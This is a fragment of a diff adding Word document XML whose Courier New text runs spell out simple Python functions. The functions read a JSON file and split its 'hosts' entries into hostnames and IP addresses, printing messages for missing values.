+        </w:rPr>
+        <w:t>json_harv_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), 'r') as </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        data = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_file.read</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    obj = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json.loads</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(data)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    if not </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_harv_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        raise Exception("No file was provided")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    return obj</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">def </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_hosts</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_harv_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    obj = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>read_json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_harv_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    hosts = obj['hosts']</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in range(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(hosts)):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        l = hosts[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>].split(':')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        hostnames = l[0]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ip_addrs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = l[1:]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        if not hostnames:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            print('No hostname found')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>elif</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> not </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ip_addrs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            print('No IP found for {}'.format(hostnames))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>elif</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ip_addrs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>) == 0:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            print('No IP found for {}'.format(hostnames))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>elif</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
